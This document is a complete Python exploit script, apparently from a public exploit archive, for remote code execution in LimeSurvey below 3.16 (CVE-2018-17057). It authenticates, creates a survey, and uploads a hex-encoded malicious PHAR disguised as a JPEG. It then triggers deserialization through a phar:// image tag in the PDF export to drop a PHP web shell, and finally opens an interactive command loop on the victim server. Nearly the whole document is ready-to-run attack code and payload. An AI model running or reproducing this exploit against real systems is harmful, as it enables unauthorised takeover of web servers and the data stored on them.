LimeSurvey Deserialization Remote Code Execution

`#!/usr/bin/python  
  
# Description: LimeSurvey < 3.16 use a old version of "TCPDF" library, this version is vulnerable to a Serialization Attack via the "phar://" wrapper.  
# Date: 29/03/2019  
# Exploit Title: Remote Code Execution in LimeSurvey < 3.16 via Serialization Attack in TCPDF.  
# Exploit Author: @q3rv0  
# Google Dork:  
# Version: < 3.16  
# Tested on: LimeSurvey 3.15  
# PoC: https://www.secsignal.org/news/remote-code-execution-in-limesurvey-3-16-via-serialization-attack-in-tcpdf  
# CVE: CVE-2018-17057  
# SecSignal is: <3  
# Usage: python exploit.py [URL] [USERNAME] [PASSWORD]  
  
import requests  
import sys  
import re  
  
SESSION = requests.Session()  
  
# Malicious PHAR generated with PHPGGC.  
# ./phpggc Yii/RCE1 system "echo 3c3f7068702073797374656d28245f4745545b2263225d293b203f3e0a | xxd -r -p > shell.php" -p phar -o /tmp/exploit.jpg  
  
PHAR = ("\x3c\x3f\x70\x68\x70\x20\x5f\x5f\x48\x41\x4c\x54\x5f\x43\x4f\x4d\x50\x49\x4c\x45\x52\x28\x29\x3b\x20\x3f\x3e\x0d\x0a\x38"  
"\x02\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x00\x00\x02\x02\x00\x00\x4f\x3a\x31\x31\x3a\x22\x43\x44\x62"  
"\x43\x72\x69\x74\x65\x72\x69\x61\x22\x3a\x31\x3a\x7b\x73\x3a\x36\x3a\x22\x70\x61\x72\x61\x6d\x73\x22\x3b\x4f\x3a\x31\x32"  
"\x3a\x22\x43\x4d\x61\x70\x49\x74\x65\x72\x61\x74\x6f\x72\x22\x3a\x33\x3a\x7b\x73\x3a\x31\x36\x3a\x22\x00\x43\x4d\x61\x70"  
"\x49\x74\x65\x72\x61\x74\x6f\x72\x00\x5f\x64\x22\x3b\x4f\x3a\x31\x30\x3a\x22\x43\x46\x69\x6c\x65\x43\x61\x63\x68\x65\x22"  
"\x3a\x37\x3a\x7b\x73\x3a\x39\x3a\x22\x6b\x65\x79\x50\x72\x65\x66\x69\x78\x22\x3b\x73\x3a\x30\x3a\x22\x22\x3b\x73\x3a\x37"  
"\x3a\x22\x68\x61\x73\x68\x4b\x65\x79\x22\x3b\x62\x3a\x30\x3b\x73\x3a\x31\x30\x3a\x22\x73\x65\x72\x69\x61\x6c\x69\x7a\x65"  
"\x72\x22\x3b\x61\x3a\x31\x3a\x7b\x69\x3a\x31\x3b\x73\x3a\x36\x3a\x22\x73\x79\x73\x74\x65\x6d\x22\x3b\x7d\x73\x3a\x39\x3a"  
"\x22\x63\x61\x63\x68\x65\x50\x61\x74\x68\x22\x3b\x73\x3a\x31\x30\x3a\x22\x64\x61\x74\x61\x3a\x74\x65\x78\x74\x2f\x22\x3b"  
"\x73\x3a\x31\x34\x3a\x22\x64\x69\x72\x65\x63\x74\x6f\x72\x79\x4c\x65\x76\x65\x6c\x22\x3b\x69\x3a\x30\x3b\x73\x3a\x31\x31"  
"\x3a\x22\x65\x6d\x62\x65\x64\x45\x78\x70\x69\x72\x79\x22\x3b\x62\x3a\x31\x3b\x73\x3a\x31\x35\x3a\x22\x63\x61\x63\x68\x65"  
"\x46\x69\x6c\x65\x53\x75\x66\x66\x69\x78\x22\x3b\x73\x3a\x31\x34\x30\x3a\x22\x3b\x62\x61\x73\x65\x36\x34\x2c\x4f\x54\x6b"  
"\x35\x4f\x54\x6b\x35\x4f\x54\x6b\x35\x4f\x57\x56\x6a\x61\x47\x38\x67\x4d\x32\x4d\x7a\x5a\x6a\x63\x77\x4e\x6a\x67\x33\x4d"  
"\x44\x49\x77\x4e\x7a\x4d\x33\x4f\x54\x63\x7a\x4e\x7a\x51\x32\x4e\x54\x5a\x6b\x4d\x6a\x67\x79\x4e\x44\x56\x6d\x4e\x44\x63"  
"\x30\x4e\x54\x55\x30\x4e\x57\x49\x79\x4d\x6a\x59\x7a\x4d\x6a\x49\x31\x5a\x44\x49\x35\x4d\x32\x49\x79\x4d\x44\x4e\x6d\x4d"  
"\x32\x55\x77\x59\x53\x42\x38\x49\x48\x68\x34\x5a\x43\x41\x74\x63\x69\x41\x74\x63\x43\x41\x2b\x49\x48\x4e\x6f\x5a\x57\x78"  
"\x73\x4c\x6e\x42\x6f\x63\x41\x3d\x3d\x22\x3b\x7d\x73\x3a\x31\x39\x3a\x22\x00\x43\x4d\x61\x70\x49\x74\x65\x72\x61\x74\x6f"  
"\x72\x00\x5f\x6b\x65\x79\x73\x22\x3b\x61\x3a\x31\x3a\x7b\x69\x3a\x30\x3b\x69\x3a\x30\x3b\x7d\x73\x3a\x31\x38\x3a\x22\x00"  
"\x43\x4d\x61\x70\x49\x74\x65\x72\x61\x74\x6f\x72\x00\x5f\x6b\x65\x79\x22\x3b\x69\x3a\x30\x3b\x7d\x7d\x08\x00\x00\x00\x74"  
"\x65\x73\x74\x2e\x74\x78\x74\x04\x00\x00\x00\x36\xad\x9d\x5c\x04\x00\x00\x00\x0c\x7e\x7f\xd8\xb6\x01\x00\x00\x00\x00\x00"  
"\x00\x74\x65\x73\x74\xcc\xd9\x99\xbd\x5e\x65\x4e\x03\x9b\x90\xdd\xd5\x8b\xff\x28\xd2\x37\x8b\x23\xe5\x02\x00\x00\x00\x47"  
"\x42\x4d\x42")  
  
def usage():  
if len(sys.argv) != 4:  
print "Usage: python exploit.py [URL] [USERNAME] [PASSWORD]"  
sys.exit(0)  
  
def get(url):  
r = SESSION.get(url, verify=False)  
return r.text  
  
def post(url, data={}, files=None, headers=None):  
r = SESSION.post(url, data=data, headers=headers, files=files, verify=False)  
return r.text  
  
def getYIICSRFToken(url):  
res = get(url)  
token = re.findall(r'value="(.*)" name="YII_CSRF_TOKEN"', res)  
return token[0]   
  
def getKCSRFToken(url):  
res = get(url)  
token = re.findall(r'csrftoken = "(.*)";', res)  
return token[0]  
  
def login(url, username, password):  
token = getYIICSRFToken(url)  
data = {"YII_CSRF_TOKEN" : token,  
"authMethod" : "Authdb",   
"user" : username,  
"password" : password,  
"loginlang" : "default",  
"action" : "login",  
"width" : "1366",  
"login_submit" : "login"  
}  
res = post(url, data)  
if len(re.findall("loginform", res)) == 0:  
return True  
else:  
return False  
  
def emailTemplates(url):  
return get(url)   
  
def createSurvey(url_newsurvey, url_insert):  
token = getYIICSRFToken(url_newsurvey)  
data = {"YII_CSRF_TOKEN" : token,  
"surveyls_title" : "Survey Example - SecSignal",  
"language" : "en",  
"createsample" : "0",  
"description" : "foo",  
"url" : "",  
"urldescrip" : "",  
"dateformat" : "1",  
"numberformat_en": "0",  
"welcome" : "bar",  
"endtext" : "asdf",  
"owner_id" : "1",  
"admin" : "Administrator",  
"adminemail" : "test%40gsecsignal.org",  
"bounce_email" : "test%40gsecsignal.org",  
"faxto" : "",  
"gsid" : "1",  
"format" : "G",  
"template" : "fruity",  
"navigationdelay": "0",  
"questionindex" : "0",  
"showgroupinfo" : "B",  
"showqnumcode" : "X",  
"shownoanswer" : "Y",  
"showxquestions" : "0",  
"showxquestions" : "1",  
"showwelcome" : "0",  
"showwelcome" : "1",  
"allowprev" : "0",  
"nokeyboard" : "0",  
"showprogress" : "0",  
"showprogress" : "1",  
"printanswers" : "0",  
"publicstatistics" : "0",  
"publicgraphs" : "0",  
"autoredirect" : "0",  
"startdate" : "",  
"expires" : "",  
"listpublic" : "0",  
"usecookie" : "0",  
"usecaptcha_surveyaccess" : "0",  
"usecaptcha_registration" : "0",  
"usecaptcha_saveandload" : "0",  
"datestamp" : "0",  
"ipaddr" : "0",  
"refurl" : "0",  
"savetimings" : "0",  
"assessments" : "0",  
"allowsave" : "0",  
"allowsave" : "1",  
"emailnotificationto" : "",  
"emailresponseto" : "",  
"googleanalyticsapikeysetting" : "N",  
"googleanalyticsstyle" : "0",  
"tokenlength" : "15",  
"anonymized" : "0",  
"tokenanswerspersistence" : "0",  
"alloweditaftercompletion" : "0",  
"allowregister" : "0",  
"htmlemail" : "0",  
"htmlemail" : "1",  
"sendconfirmation" : "0",  
"sendconfirmation" : "1",  
"saveandclose" : "1"  
}  
res = post(url_insert, data)  
surveyid = re.findall(r'surveyid\\/([0-9]+)', res)  
return surveyid[0] # Return SurveyiD  
  
def uploadPHAR(url_upload, url_csrf_token, phar):  
kcfinder_csrftoken = getKCSRFToken(url_csrf_token)  
files = {'upload[]': ('malicious.jpg', phar)}  
data = {"dir" : "files",  
"kcfinder_csrftoken" : kcfinder_csrftoken  
}  
res = post(url_upload, data, files)  
return res  
  
def pdfExport(url_pdf_export, surveyid):  
token = getYIICSRFToken(url_pdf_export + surveyid)  
data = {"save_language" : "en",  
"queXMLStyle" : '<h1>Stage 2</h1><img src="phar://./upload/surveys/'+ surveyid + '/files/malicious.jpg">',  
"queXMLSingleResponseAreaHeight" : "9",  
"queXMLSingleResponseHorizontalHeight" : "10.5",  
"queXMLQuestionnaireInfoMargin" : "5",  
"queXMLResponseTextFontSize" : "10",  
"queXMLResponseLabelFontSize" : "7.5",  
"queXMLResponseLabelFontSizeSmall" : "6.5",  
"queXMLSectionHeight" : "18",  
"queXMLBackgroundColourSection" : "221",  
"queXMLBackgroundColourQuestion" : "241",  
"queXMLAllowSplittingSingleChoiceHorizontal" : "0",  
"queXMLAllowSplittingSingleChoiceHorizontal" : "1",  
"queXMLAllowSplittingSingleChoiceVertical" : "0",  
"queXMLAllowSplittingSingleChoiceVertical" : "1",  
"queXMLAllowSplittingMatrixText" : "0",  
"queXMLAllowSplittingMatrixText" : "1",  
"queXMLAllowSplittingVas" : "0",  
"queXMLPageOrientation" : "P",  
"queXMLPageFormat" : "A4",  
"queXMLEdgeDetectionFormat" : "lines",  
"YII_CSRF_TOKEN" : token,  
"ok" : "Y"}  
res = post(url_pdf_export + surveyid, data)  
return res   
  
def shell(url):  
r = requests.get("%s/shell.php" % url)  
if r.status_code == 200:  
print "[+] Pwned! :)"  
print "[+] Getting the shell..."  
while 1:  
try:  
input = raw_input("$ ")  
r = requests.get("%s/shell.php?c=%s" % (url, input))  
print r.text  
except KeyboardInterrupt:  
sys.exit("\nBye kaker!")  
else:  
print "[*] The site seems not to be vulnerable :("  
  
def main():  
usage()  
url = sys.argv[1] # URL  
username = sys.argv[2] # Username  
password = sys.argv[3] # Password  
url_login = "%s/index.php/admin/authentication/sa/login" % url  
  
print "[*] Logging in to LimeSurvey..."  
if login(url_login, username, password):  
  
url_newsurvey = "%s/index.php/admin/survey/sa/newsurvey" % url  
url_insert = "%s/index.php/admin/survey/sa/insert" % url  
  
print "[*] Creating a new Survey..."  
surveyid = createSurvey(url_newsurvey, url_insert)   
print "[+] SurveyID: %s" % surveyid  
  
email_templates = "%s/index.php/admin/emailtemplates/sa/index/surveyid/%s" % (url, surveyid)  
  
emailTemplates(email_templates)  
  
url_csrf_token = "%s/third_party/kcfinder/browse.php?opener=custom&type=files&CKEditor=email_invitation_en&langCode=en" % url  
url_upload = "%s/third_party/kcfinder/browse.php?type=files&lng=en&opener=custom&act=upload" % url  
  
print "[*] Uploading a malicious PHAR..."  
uploadPHAR(url_upload, url_csrf_token, PHAR)  
  
url_pdf_export = "%s/index.php/admin/export/sa/quexml/surveyid/" % url  
  
print "[*] Sending the Payload..."  
export_response = pdfExport(url_pdf_export, surveyid)  
print "[*] TCPDF Response: %s" % export_response  
  
shell(url)  
else:  
print "[-] Bad credentials :("  
  
if __name__ == "__main__":  
main()  
`